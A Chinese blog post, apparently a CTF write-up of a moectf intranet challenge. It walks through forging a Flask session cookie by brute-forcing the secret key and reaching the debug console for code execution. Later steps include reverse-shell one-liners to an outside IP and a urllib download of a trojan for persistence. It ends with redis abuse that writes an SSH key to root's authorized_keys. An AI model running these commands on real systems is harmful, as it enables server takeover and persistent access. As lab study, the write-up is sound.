<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="# Flask sission伪造  &#96;eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6ImEifQ.ZPCs8A.zy4YgL-lcI8PRWd2BzUSZbpByLw&#96;  第一部分我们称它为头部（[header](https:&#x2F;&#x2F;so.csdn.net&#x2F;so&#x2F;search?q&#x3D;header&amp;spm&#x3D;1001.2101.3001.7020))，第二部分我们称其为载荷（paylo">
<meta property="og:type" content="article">
<meta property="og:title" content="Flask sission伪造">
<meta property="og:url" content="http://example.com/2026/09/16/47-Flask-sission%E4%BC%AA%E9%80%A0/index.html">
<meta property="og:site_name" content="Glut4micum">
<meta property="og:description" content="# Flask sission伪造  &#96;eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6ImEifQ.ZPCs8A.zy4YgL-lcI8PRWd2BzUSZbpByLw&#96;  第一部分我们称它为头部（[header](https:&#x2F;&#x2F;so.csdn.net&#x2F;so&#x2F;search?q&#x3D;header&amp;spm&#x3D;1001.2101.3001.7020))，第二部分我们称其为载荷（paylo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-09-16T14:20:57.000Z">
<meta property="article:modified_time" content="2026-09-16T14:20:57.000Z">
<meta property="article:author" content="谷氨酸棒状杆菌">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="学习笔记">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2026/09/16/47-Flask-sission%E4%BC%AA%E9%80%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Flask sission伪造 | Glut4micum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Glut4micum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/16/47-Flask-sission%E4%BC%AA%E9%80%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
      <meta itemprop="name" content="谷氨酸棒状杆菌">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glut4micum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Flask sission伪造
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-09-16 22:20:57" itemprop="dateCreated datePublished" datetime="2026-09-16T22:20:57+08:00">2026-09-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">知识笔记</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="本文总阅读两 fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        
# Flask sission伪造

`eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6ImEifQ.ZPCs8A.zy4YgL-lcI8PRWd2BzUSZbpByLw`

第一部分我们称它为头部（[header](https://so.csdn.net/so/search?q=header&spm=1001.2101.3001.7020))，第二部分我们称其为载荷（payload，类似于飞机上承载的物品)，第三部分是签证（signature),是一段base64编码,解码后

{"power":"guest","user":"a"}.ZPCs8A.zy4YgL-lcI8PRWd2BzUSZbpByLw

![image.png](/yuque-notes/02-Knowledge Book/assets/83fbe5f7-image.png)import 模块名：这种方式引入模块时，使用模块内的函数，需要使用**模块.函数名**的方式来调用函数

os.urandom()方法是用来生成一个大小为随机字节的字符串

os就是提供了一些方便使用操作系统相关功能的函数。

python中的os库提供了非常丰富的方法用来处理文件和目录。

我们需要的是破解加密的密钥

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> itertools</span><br><span class="line"></span><br><span class="line">charset = <span class="string">&quot;0123456789abcdef&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 生成所有可能的密码组合</span></span><br><span class="line">passwords = [<span class="string">&#x27;&#x27;</span>.join(p) <span class="keyword">for</span> p <span class="keyword">in</span> itertools.product(charset, repeat=<span class="number">4</span>)]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 将密码组合写入字典文件</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;dictionary.txt&quot;</span>, <span class="string">&quot;w&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    <span class="keyword">for</span> password <span class="keyword">in</span> passwords:</span><br><span class="line">        file.write(<span class="string">&quot;This-random-secretKey-you-can&#x27;t-get&quot;</span>+password + <span class="string">&quot;\n&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

python脚本爆破出所有可能的密码,生成字典

`flask-unsign --unsign --cookie eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6Imtpbm8ifQ.ZPGgKg.nlKIs-0-Ae6pywqN0NRxYFCquvs --wordlist dictionary.txt`,wordlist就是指定我们的字典,后面跟的是字典的路径

`eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6Imtpbm8ifQ.ZPGgKg.nlKIs-0-Ae6pywqN0NRxYFCquvs`

得出key是这个:`This-random-secretKey-you-can't-getcfdb`

接着我们利用脚本flask-session-cookie-manager和已知的密钥伪造session

`python3 flask_session_cookie_manager3.py encode -s "This-random-secretKey-you-can't-get6bbc" -t "{'power': 'admin', 'user': 'kino'}"`

得到关键信息

![image.png](/yuque-notes/02-Knowledge Book/assets/df5c0698-image.png)

1. Console（控制台）： 控制台是计算机上的一个命令行界面，允许用户与操作系统或应用程序进行交互。通过控制台，用户可以输入命令并查看程序的输出结果。控制台可以用于调试和运行命令行程序。
2. Flask： Flask是一个用Python编写的轻量级Web应用框架。它提供了一组工具和库，使开发Web应用变得更加简单和快速。Flask基于Werkzeug和Jinja2库，它使用Python的装饰器语法来定义路由和视图函数。

所以我们可以根据提示进入默认内置的console执行代码,pin码我感觉就是一个通行的密码,输入之后就进入到控制台

![image.png](/yuque-notes/02-Knowledge Book/assets/fcd1c8ef-image.png)

​

我们就可以在这里进行简单的rce得到flag的第一给部分moectf{Information-leakage-Is-dangerous!

![image.png](/yuque-notes/02-Knowledge Book/assets/b4eee9e6-image.png)

![image.png](/yuque-notes/02-Knowledge Book/assets/600e81d7-image.png)

![image.png](/yuque-notes/02-Knowledge Book/assets/cb713ab8-image.png)

另一种方法,反弹shell

`os.popen('bash -c "bash -i >& /dev/tcp/114.116.119.253/2333 0>&1"').read()`

## 反弹shell的命令

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/<span class="number">47.</span>xxx.xxx<span class="number">.72</span>/<span class="number">2333</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br><span class="line">或bash -c <span class="string">&quot;bash -i &gt;&amp; /dev/tcp/47.xxx.xxx.72/2333 0&gt;&amp;1&quot;</span></span><br><span class="line"><span class="comment"># bash -i &gt;&amp; /dev/tcp/攻击机IP/攻击机端口 0&gt;&amp;1</span></span><br></pre></td></tr></table></figure>

![image.png](/yuque-notes/02-Knowledge Book/assets/c928c1b6-image.png)

## 拿到控制权

![image.png](/yuque-notes/02-Knowledge Book/assets/1f74fb65-image.png)

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">cat /readme</span><br><span class="line">恭喜你通过外网渗透拿下了本台服务器的权限</span><br><span class="line">接下来，你需要尝试内网渗透，本服务器的/app/tools目录下内置了fscan</span><br><span class="line">你需要了解它的基本用法，然后扫描内网的ip段</span><br><span class="line">如果你进行了正确的操作，会得到类似下面的结果</span><br><span class="line"><span class="number">10.1</span><span class="number">.11</span><span class="number">.11</span>:<span class="number">22</span> <span class="built_in">open</span></span><br><span class="line"><span class="number">10.1</span><span class="number">.23</span><span class="number">.21</span>:<span class="number">8080</span> <span class="built_in">open</span></span><br><span class="line"><span class="number">10.1</span><span class="number">.23</span><span class="number">.23</span>:<span class="number">9000</span> <span class="built_in">open</span></span><br><span class="line">将你得到的若干个端口号从小到大排序并以 - 分割，这一串即为hint.<span class="built_in">zip</span>压缩包的密码（本例中，密码为：<span class="number">22</span>-<span class="number">8080</span>-<span class="number">9000</span>）</span><br><span class="line">注意：请忽略掉xx.xx.xx<span class="number">.1</span>，例如扫出三个ip <span class="number">192.168</span><span class="number">.0</span><span class="number">.1</span> <span class="number">192.168</span><span class="number">.0</span><span class="number">.2</span> <span class="number">192.168</span><span class="number">.0</span><span class="number">.3</span> ，请忽略掉有关<span class="number">192.168</span><span class="number">.0</span><span class="number">.1</span>的所有结果！此为出题人服务器上的其它正常服务</span><br><span class="line">对密码有疑问随时咨询出题人</span><br></pre></td></tr></table></figure>

fscan 是一个内网综合扫描工具，方便一键自动化、全方位漏洞扫描。

​

搭建C2平台,

![image.png](/yuque-notes/02-Knowledge Book/assets/dfd70727-image.png)

进行权限维持

利用urllib模块远程下载木马文件到目标机上

![image.png](/yuque-notes/02-Knowledge Book/assets/f63c8dbe-image.png)

` urllib.request.urlretrieve('http://114.116.119.253:4444/moectf','/tmp/moectf')`

![image.png](/yuque-notes/02-Knowledge Book/assets/5cb386f3-image.png)

成功上传木马文件

![image.png](/yuque-notes/02-Knowledge Book/assets/b0057ffa-image.png)

设置文件权限为可执行

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">chmod +x 文件名</span><br><span class="line"></span><br><span class="line">任何用户均可运行此程序：</span><br><span class="line"></span><br><span class="line">chmod a+x 文件名</span><br><span class="line"></span><br><span class="line">撤销可运行权限：</span><br><span class="line"></span><br><span class="line">chmod -x 文件名</span><br></pre></td></tr></table></figure>

![image.png](/yuque-notes/02-Knowledge Book/assets/0919c6a3-image.png)

![image.png](/yuque-notes/02-Knowledge Book/assets/182c2e13-image.png)

主要起到权限维持的作用

​

之后需要扫描内网段,获取密码

![image.png](/yuque-notes/02-Knowledge Book/assets/f55a6ad0-image.png)

22-3306-6379-8080

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">当你看到此部分，证明你正确的进行了fscan的操作得到了正确的结果</span><br><span class="line">可以看到，在本内网下还有另外两台服务器</span><br><span class="line">其中一台开启了<span class="number">22</span>(ssh)和<span class="number">6379</span>(redis)端口</span><br><span class="line">另一台开启了<span class="number">3306</span>(mysql)端口</span><br><span class="line">还有一台正是你访问到的留言板服务</span><br><span class="line">接下来，你可能需要搭建代理，从而使你的本机能直接访问到内网的服务器</span><br><span class="line">此处可了解`nps`和`frp`，同样在/app/tools已内置了相应文件</span><br><span class="line">连接代理，推荐`proxychains`</span><br><span class="line">对于mysql服务器，你需要找到其账号密码并成功连接，在数据库中找到flag2</span><br><span class="line">对于redis服务器，你可以学习其相关的渗透技巧，从而获取到redis的权限，并进一步寻找其getshell的方式，最终得到flag3</span><br><span class="line"></span><br></pre></td></tr></table></figure>

隧道搭建,进入内网

​

## MySQL

![image.png](/yuque-notes/02-Knowledge Book/assets/f218ebc4-image.png)

![image.png](/yuque-notes/02-Knowledge Book/assets/92281620-image.png)

172.20.0.2

![image.png](/yuque-notes/02-Knowledge Book/assets/7a8ebc45-image.png)

flag2:`-Are-YOu-myS0L-MasT3r?-`

​

​

## redis

![image.png](/yuque-notes/02-Knowledge Book/assets/56cdec90-image.png)

规则如sql,将应用名用引号包裹

redis写私钥进行ssh连接

生成私钥对

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa    <span class="comment"># 生成公钥和私钥</span></span><br></pre></td></tr></table></figure>

![image.png](/yuque-notes/02-Knowledge Book/assets/45a2a763-image.png)

id_rsa表示私钥 id_rsa.pub是公钥

私钥是我们登录用的

写公钥到目标/root/.ssh/authorized_keys

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> x <span class="string">&quot;\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCOOosQXe7z00WG9CW46SHDzzbNmkr0JLyd9fc540xDjKtBdimWrq+/4aDhvU5TrLX/smDEDvL2cNQgCHMCADDLvcaRTqm+j/m0lc4lENDVEVxlfpXzF1vy62X3/KX+yfUg07aJQbZYTmFqbgfPiTZpoeJCRYFq7ifkLMT+DO1PKw0QKwjLBcHPADe5tJpiyCMrWhHNvIICyxs9Q37QFNVrKOxglI4ikispgOEqoVGpDgz4Mn2IhXzMAwA8ZYAjDikSKQ6CugPJwLyY7x3sBnx/wthrHXv1Z3i5VWGvuXzXzT1Dyql4WDKK4PoVA3zEeWULKE98YPkP8dTyrejhnBLgCmSTYzEcaJbHL3kr9NY2mbMlzY0sj4R64m7RHAQe+OgBnqTp0RYkMzEKdyMfQormAxcDuZSOjwtmA1fPKuAghRERJn9VItEPTN/Qx7HaVirl7CALEfRKQRR4CqMEJvjgQrsWgkcBcrJk1QgfmSYzdj1YcCE+qz9aer6jdyvSSiU=\n&quot;</span></span><br><span class="line">config <span class="built_in">set</span> <span class="built_in">dir</span> /root/.ssh</span><br><span class="line">config <span class="built_in">set</span> dbfilename authorized_keys</span><br><span class="line">save</span><br></pre></td></tr></table></figure>

![image.png](/yuque-notes/02-Knowledge Book/assets/0adcd286-image.png)![image.png](/yuque-notes/02-Knowledge Book/assets/9ea93aa1-image.png)

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Congratulations!!!</span><br><span class="line">You beat this moeworld~</span><br><span class="line">You need to protect your redis, even <span class="keyword">if</span> it<span class="string">&#x27;s on the intranet.</span></span><br><span class="line"><span class="string">This is the third part of the flag</span></span><br><span class="line"><span class="string">P@sSW0Rd-F0r-redis-Is-NeceSsary&#125;</span></span><br></pre></td></tr></table></figure>

## VSHELL木马生成

![image.png](/yuque-notes/02-Knowledge Book/assets/cd84fee8-image.png)

---

来源: https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/yr581p08nepcm8pw
语雀文档ID: 137977046


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"># Web安全</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag"># 学习笔记</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/16/46-JavaScript/" rel="prev" title="JavaScript">
      <i class="fa fa-chevron-left"></i> JavaScript
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/09/16/48-Python/" rel="next" title="Python">
      Python <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="谷氨酸棒状杆菌"
      src="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
  <p class="site-author-name" itemprop="name">谷氨酸棒状杆菌</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">72</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Glut4micum" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Glut4micum" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">谷氨酸棒状杆菌</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总访客量 fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总阅读量 fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
